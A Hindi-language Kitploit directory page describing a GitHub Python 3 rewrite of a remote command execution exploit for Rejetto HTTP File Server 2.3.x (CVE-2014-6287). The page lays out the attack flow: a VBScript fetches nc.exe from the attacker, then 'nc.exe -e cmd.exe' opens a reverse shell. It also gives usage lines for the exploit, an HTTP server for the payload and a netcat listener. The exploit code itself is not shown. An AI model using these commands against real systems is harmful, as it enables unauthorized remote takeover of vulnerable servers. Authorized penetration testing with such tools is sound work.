Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubjoaz94/rejjeto_hfs-rce-exploit-cve-2014-6287

rejjeto_hfs-rce-exploit-cve-2014-6287

Rejetto HTTP File Server 2.3.x (CVE-2014-6287) के लिए रिमोट कमांड निष्पादन शोषण, आधुनिक आक्रामक सुरक्षा परीक्षण के लिए Python 3 में पुनर्लिखित।

रिपॉजिटरी देखें
99 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

HFS रिमोट कमांड एक्ज़ीक्यूशन एक्सप्लॉइट (CVE-2014-6287)

यह क्लासिक रिमोट कमांड एक्ज़ीक्यूशन (RCE) एक्सप्लॉइट का Python 3 पुनर्लेखन है जो Rejetto HTTP File Server (HFS) v2.3.x को लक्षित करता है, जो CVE-2014-6287 के रूप में पहचानी गई कमजोरी का लाभ उठाता है।

मूल रूप से Avinash Kumar Thapa उर्फ "-Acid" द्वारा खोजा गया, यह संस्करण पोर्टेबिलिटी और उपयोगिता में सुधार करता है, पूर्ण पैरामीटराइजेशन और आधुनिक अनुकूलता प्रदान करता है।


⚠️ अस्वीकरण

यह टूल विशेष रूप से शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।


📌 एक्सप्लॉइट विवरण

  • कमज़ोरी: Rejetto HFS v2.3.x - रिमोट कमांड एक्ज़ीक्यूशन
  • CVE: CVE-2014-6287
  • प्रभाव: सिस्टम विशेषाधिकारों के साथ रिमोट कोड निष्पादन
  • आवश्यकता: लक्ष्य स्क्रिप्टिंग सक्षम के साथ HFS का एक कमजोर संस्करण चला रहा होना चाहिए।

🚀 विशेषताएँ

  • Python 3 के साथ पूरी तरह से संगत
  • CLI के माध्यम से सभी प्रमुख पैरामीटर स्वीकार करता है:
    • लक्ष्य IP और पोर्ट
    • स्थानीय IP (हमलावर)
    • रिवर्स शेल के लिए सुनने का पोर्ट
    • nc.exe होस्ट करने के लिए उपयोग किया जाने वाला पोर्ट
  • कोई हार्डकोडेड मान नहीं
  • VBScript का उपयोग करके क्लासिक nc.exe रिवर्स शेल वितरण
  • एक्सप्लॉइट प्रवाह:
    1. nc.exe डाउनलोड करने के लिए एक VBScript अपलोड करें
    2. लक्ष्य पर VBScript निष्पादित करें
    3. रिवर्स शेल स्थापित करने के लिए nc.exe -e cmd.exe चलाएँ

🛠️ उपयोग

python3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>

Example:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000

Requirements:
  - HTTP server serving nc.exe:
      python3 -m http.server 8000
  - Listener:
      nc -lvnp 4444
टूल डाउनलोड करें